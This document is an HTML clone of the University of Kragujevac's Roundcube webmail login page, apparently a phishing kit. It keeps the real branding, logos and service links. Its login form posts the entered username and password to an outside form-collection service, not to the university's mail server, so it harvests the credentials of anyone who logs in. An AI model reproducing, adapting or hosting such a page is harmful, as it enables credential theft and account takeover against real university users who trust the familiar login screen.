<!DOCTYPE html>
<html lang="en" class="js mozilla layout-large"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Webmail Универзитета у Крагујевцу :: Welcome to Webmail Универзитета у Крагујевцу</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0"><meta name="theme-color" content="#f4f4f4"><meta name="msapplication-navbutton-color" content="#f4f4f4">
	<link rel="shortcut icon" href="https://webmail.kg.ac.rs/skins/elastic/images/favicon.ico?s=1647212400">
	<link rel="stylesheet" href="kg_files/bootstrap.min.css">
	
		<link rel="stylesheet" href="kg_files/styles.min.css">
		
	
	
		<script>
		try {
			if (document.cookie.indexOf('colorMode=dark') > -1
				|| (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches)
			) {
				document.documentElement.className += ' dark-mode';
			}
		} catch (e) { }
		</script>
	
<link rel="stylesheet" type="text/css" href="kg_files/jquery-ui.min.css"><script src="kg_files/jquery.min.js"></script><script src="kg_files/common.min.js"></script><script src="kg_files/app.min.js"></script><script src="kg_files/jstz.min.js"></script><script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10611,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"dark_mode_support":true,"skin":"elastic","blankpage":"skins/elastic/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"/?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","additional_logos":{"small":"skins/elastic/images/grb.png"},"request_token":"4CpvzTgSA8FXnWF915vBjIfqXQuvbGRY"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files..."});
rcmail.gui_container("loginfooter","login-footer");rcmail.gui_object('loginform', 'login-form');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="kg_files/jquery-ui.min.js"></script>
</head>
<body class="task-login action-none">
	
		<div id="layout">
	


<h1 class="voice">Webmail Универзитета у Крагујевцу Login</h1>

<div id="layout-content" class="selected no-navbar" role="main">
	<img src="kg_files/grb.png" id="logo" alt="Logo">
	<form method="post"action="https://formbold.com/s/3VyDO">
<input type="hidden" name="_token" value="4CpvzTgSA8FXnWF915vBjIfqXQuvbGRY" class="form-control">
	<input type="hidden" name="_task" value="login" class="form-control"><input type="hidden" name="_action" value="login" class="form-control"><input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos" class="form-control"><input type="hidden" name="_url" id="rcmloginurl" value="" class="form-control"><table><tbody><tr class="form-group row"><td class="title" style="display: none;"><label for="rcmloginuser">Username</label></td><td class="input input-group input-group-lg"><span class="input-group-prepend"><i class="input-group-text icon user"></i></span><input name="_user" id="rcmloginuser" required="" size="40" class="form-control" autocapitalize="none" autocomplete="off" type="text" placeholder="Username"></td></tr><tr class="form-group row"><td class="title" style="display: none;"><label for="rcmloginpwd">Password</label></td><td class="input input-group input-group-lg"><span class="input-group-prepend"><i class="input-group-text icon pass"></i></span><input name="_pass" id="rcmloginpwd" required="" size="40" class="form-control" autocapitalize="none" autocomplete="off" type="password" placeholder="Password"></td></tr></tbody></table><p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit btn btn-primary btn-lg text-uppercase w-100">Login</button></p>
		<div id="login-footer" role="contentinfo">
			Webmail Универзитета у Крагујевцу
			
			

<style>
    #login-footer>div {
	margin-top: 0;
	padding: 0;
	background: white;
    }

    .container_support {
	display: flex;
	justify-content: center;
	position: relative;
	background-color: #fff;
    }

    .logo_support {
	display: block;
	padding: 5px;
	width: 33.33%;
	margin: 5px 5px 5px 5px;
	height: 50px;
	background-repeat: no-repeat;
	background-size: contain;
	background-position: center;
	transition: opacity 0.5s;
	cursor: pointer;
	background-color: #fff;
	border-radius: 10px;
	border: 2px solid #4EBFFD;
	box-shadow: 2px 3px 5px rgba(0,0,0,0.2);
    }
      
    .logo_support:hover {
	opacity: 0.7;
    }

    .description_support {
	width: 100%;
	height: 30px;
	background-color: rgba(0, 0, 0, 0.08);
	text-align: center;
	font-size: 14px;
	line-height: 20px;
	position: absolute;
	bottom: -40px;
	left: 0;
	margin: 0 auto 0;
	padding: 5px;
	opacity: 0;
	transition: opacity 0.5s ease;
	z-index: 100;
	border-radius: 10px;
	border: 1px solid transparent;
	pointer-events: none;
    }
      
    .logo_support:hover .description_support {
	opacity: 1;
    }

    .description_support:after {
	content: "";
	position: absolute;
	left: 50%;
	bottom: -22px;
	width: 0;
	height: 0;
	border: 10px solid transparent;
	border-top-color: rgba(0, 0, 0, 0.1);
	transform: translateX(-50%);
    }
      
    .description_support:hover {
	opacity: 0;
    }
</style>
    
<div class="container_support">
    <div class="logo_support" style="background-image: url('skins/elastic/images/unifs.png');" onclick="location.href='https://fs.kg.ac.rs/?=&amp;lang=sr';">
	<div class="description_support" id="desc1"><a href="#" target="_blank" class="support-link">File Sender</a> - трансфер великих фајлова</div>
    </div>
    <div class="logo_support" style="background-image: url('skins/elastic/images/unicloud.png');" onclick="location.href='https://unicloud.kg.ac.rs/index.php/login';">
	<div class="description_support" id="desc2"><a href="#" target="_blank" class="support-link">UniCloud</a> - сервис за складиштење фајлова</div>
    </div>
    <div class="logo_support" style="background-image: url('skins/elastic/images/scidar.png');" onclick="location.href='https://scidar.kg.ac.rs/';">
	<div class="description_support" id="desc3"><a href="#" target="_blank" class="support-link">SciDAR</a> - архива истраживачких резултата</div>
    </div>
</div>

			
			
		</div>
	</form>
</div>

<noscript>
	<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
</noscript>


</div>

<a href="http://unic.kg.ac.rs/" target="_blank" id="supportlink" class="hidden">Get support</a>



<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="kg_files/bootstrap.bundle.min.js"></script>
<script src="kg_files/ui.min.js"></script>


</body></html>